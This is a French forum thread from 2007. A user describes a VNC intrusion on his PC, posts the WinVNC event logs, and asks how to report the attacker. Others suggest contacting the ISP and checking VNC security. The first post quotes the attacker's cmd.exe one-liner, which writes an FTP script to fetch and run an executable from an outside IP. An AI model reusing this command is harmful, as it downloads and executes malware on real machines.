b.vincent Posté(e) le 21 avril 2007 Partager Posté(e) le 21 avril 2007 Bonjour, je vous expose mon problème. Je regardai bien tranquillement un film sur mon ordinateur lorsque tout à coup ça s'agite sévèrement. Mon film se coupe, une invite de commande se lance avec une commande trés douteuse mais cela est clair c'est une attaque (sur le port 5900(VNC default) après lecture des logs). Reflex je debranche mon adaptateur wifi illico. Pas de dommage Immédiatement je consulte les logs et récupère l'ip du gus qui il y a de grandes chance pour qu'il ne soit techniquement pas être trés compétent. Il a du récupérer un petit logiciel qui va bien pour ensuite supprimer en masse le contenu de ma bécane. D'autant plus qu'il a forcément effectué un scan de mes port ce qui je sais est interdit par la loi. Il faut obligatoirement une dérogation signée par le possesseur du réseau scanné. Ma question est que puis-je / dois-je faire. Car ça m'étonnerai vu son peu de discretion que ce "H4ch3r" est fait une attaque par rebond. Faut-il en réferer à mon provider, qui contacter ? Merci de vos réponses. Voici les traces que j'ai récupérées: Type de l'événement : Informations Source de l'événement : WinVNC4 Catégorie de l'événement : Aucun ID de l'événement : 1 Date : 21/04/2007 Heure : 14:56:43 Utilisateur : N/A Ordinateur : PC-BENJAMIN Description : Connections: closed: 83.72.63.54::3356 (read: Connection reset by peer (10054)) Type de l'événement : Informations Source de l'événement : WinVNC4 Catégorie de l'événement : Aucun ID de l'événement : 1 Date : 21/04/2007 Heure : 14:56:22 Utilisateur : N/A Ordinateur : PC-BENJAMIN Description : Connections: accepted: 83.72.63.54::3356 Type de l'événement : Informations Source de l'événement : WinVNC4 Catégorie de l'événement : Aucun ID de l'événement : 1 Date : 21/04/2007 Heure : 14:56:22 Utilisateur : N/A Ordinateur : PC-BENJAMIN Description : Connections: closed: 83.72.63.54::3354 (Clean disconnection) Type de l'événement : Erreur Source de l'événement : WinVNC4 Catégorie de l'événement : Aucun ID de l'événement : 1 Date : 21/04/2007 Heure : 14:56:22 Utilisateur : N/A Ordinateur : PC-BENJAMIN Description : SocketManager: unknown listener event: 0 Type de l'événement : Informations Source de l'événement : WinVNC4 Catégorie de l'événement : Aucun ID de l'événement : 1 Date : 21/04/2007 Heure : 14:56:22 Utilisateur : N/A Ordinateur : PC-BENJAMIN Description : Connections: accepted: 83.72.63.54::3354 Voici la commande récupérée cmd.exe /c del i&echo open 88.160.48.7 13867 > i&echo user 1 1 >> i &echo get 174.exe >> i &echo quit >> i &ftp -n -s:i &174.exe&del i&exit Lien vers le commentaire Partager sur d’autres sites More sharing options...
Oberkampf Posté(e) le 21 avril 2007 Partager Posté(e) le 21 avril 2007 Salut, Je vais peut-être dire une connerie mais si tu n'es pas en ip fixe, le "gus" va avoir du mal à te retrouver... Donc pour moi il y a juste à attendre le changement d'ip. Lien vers le commentaire Partager sur d’autres sites More sharing options...
Benaddar Posté(e) le 22 avril 2007 Partager Posté(e) le 22 avril 2007 Oui mais je suis en IP fixe, de plus la commande qu'il a saisie semble avoir téléchargée un programme sur un ftp puis j'imagine qu'il l'a executer se programme et enfin à éffacé le binaire (ça ressemble à un botnet non?). De toute façon le question est plus que puis-je faire légalement et à qui m'adresser pour dénoncer ceci et surtout fournir les emprunte que j'ai récupérées. Lien vers le commentaire Partager sur d’autres sites More sharing options...
gougou59 Posté(e) le 22 avril 2007 Partager Posté(e) le 22 avril 2007 Tu peux envoyer les traces à son FAI. Après recherche de l'IP, son FAI est Tele2 Danemark et comme indiqué sur le whois tu peux envoyer un mail à abuse-dk@tele2.com (in english of course). Je sais pas si ils font quelque chose ou s'ils s'en foutent après Apparemment, le FTP sur lequel il télécharge le fichier .exe est une freebox donc la source est a priori déjà un bot :/ Par contre, ce qui est inquietant, c'est qu'il ait réussi à se connecter à ton PC!! Ca veut dire qu'il y a une "faille" quelque part!! Il y a bien un mdp de connexion sur ton VNC? C'est bien la dernière version? (pour éviter toute faille exploitée...) Lien vers le commentaire Partager sur d’autres sites More sharing options...
Eagle1 Posté(e) le 22 avril 2007 Partager Posté(e) le 22 avril 2007 sinon tu te protège bien et comme ça tu t'en fous, ça fera un gars qui aura pas de problème et toi non plus.... je pense pas que tu ai des fichiers digne d'un secret d'état pour que le gars s'acharne.... Lien vers le commentaire Partager sur d’autres sites More sharing options...
Benaddar Posté(e) le 23 avril 2007 Partager Posté(e) le 23 avril 2007 VNC etait bien protéger par un mot de passe, enfin bon j'ai fermé la porte bien entendu. Et je pense bien qu'il y est de grandes chances pour qu'il ne revienne pas mais c'est surtout qu'à mon avis c'est un script kiddies qui à récupérer un ptit soft qui va bien et ce genre de personne m'exaspère au plus au point alors je voulais tenter de faire quelque chose. Lien vers le commentaire Partager sur d’autres sites More sharing options...
julienjb Posté(e) le 23 avril 2007 Partager Posté(e) le 23 avril 2007 regarde ici: http://www.xmcopartners.com/article-befti.html Lien vers le commentaire Partager sur d’autres sites More sharing options...
Messages recommandés
Archivé
Ce sujet est désormais archivé et ne peut plus recevoir de nouvelles réponses.